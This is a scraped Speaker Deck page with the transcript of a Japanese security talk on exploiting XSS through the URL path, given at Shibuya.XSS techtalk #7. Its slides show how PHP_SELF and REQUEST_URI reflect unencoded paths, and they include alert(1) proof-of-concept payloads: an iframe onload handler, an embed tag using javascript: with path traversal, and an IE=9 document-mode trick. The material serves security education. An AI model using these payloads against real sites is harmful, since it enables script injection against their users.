Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Search
Masato Kinugawa
March 29, 2016
Technology
14
28k
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Shibuya.XSS techtalk #7 の資料です。
Masato Kinugawa
March 29, 2016
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
masatokinugawa
1
690
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
3.7k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2.3k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
19k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
22k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
20
6.9k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
99k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
26k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
12k
Other Decks in Technology
See All in Technology
組織とセキュリティ文化と、自分の一歩
maimyyym
3
1.4k
Web Intelligence and Visual Media Analytics
weblyzard
PRO
1
6.1k
AWS Lambdaでサーバレス設計を学ぼう_ベンダーロックインの懸念を超えて-サーバレスの真価を探る
fukuchiiinu
4
930
Text-to-SQLの評価データセットを作って最新LLMモデルの性能評価をしてみた
gotalab555
3
440
Test Smarter, Not Harder: Achieving Confidence in Complex Distributed Systems
eliasnogueira
1
120
会社紹介資料 / Sansan Company Profile
sansan33
PRO
6
370k
Autonomous Database サービス・アップデート (FY25)
oracle4engineer
PRO
1
720
Cursor Meetup Tokyo
iamshunta
5
1.4k
Oracle Cloud Infrastructure IaaS 新機能アップデート 2025/03 - 2025/05
oracle4engineer
PRO
1
130
MCPを利用して 自然言語で 3Dプリントしてみよう!
hamadakoji
0
960
セキュリティSaaS企業が実践するCursor運用ルールと知見 / How a Security SaaS Company Runs Cursor: Rules & Insights
tetsuzawa
1
2.9k
ゆるSRE #11 LT
okaru
1
230
Featured
See All Featured
Code Reviewing Like a Champion
maltzj
524
40k
The World Runs on Bad Software
bkeepers
PRO
68
11k
Java REST API Framework Comparison - PWX 2021
mraible
31
8.6k
Mobile First: as difficult as doing things right
swwweet
223
9.6k
Typedesign – Prime Four
hannesfritz
42
2.7k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
331
22k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
228
22k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.3k
Build The Right Thing And Hit Your Dates
maggiecrowley
35
2.7k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
180
53k
Faster Mobile Websites
deanohume
307
31k
How STYLIGHT went responsive
nonsquared
100
5.6k
Transcript
None
None
None
None
None
https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...
... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1
... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1
None
http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz
http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc
None
SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>
GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php
/test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E
http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
/test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1
/test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>
None
None
None
None
None
None
None
None
None
None
None
None
None
None
None
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta
http-equiv="X-UA-Compatible" content="IE=9"> </head>
<svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>
ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError
<meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe
src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf
<meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>
<script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>
None
None
None
None
None
None
None
None
None
None
None
None
None
masatokinugawa
maimyyym
weblyzard
fukuchiiinu
gotalab555
eliasnogueira
sansan33
oracle4engineer
iamshunta
hamadakoji
tetsuzawa
okaru
maltzj
bkeepers
mraible
swwweet
hannesfritz
caitiem20
danielanewman
thoeni
maggiecrowley
soudai
deanohume
nonsquared
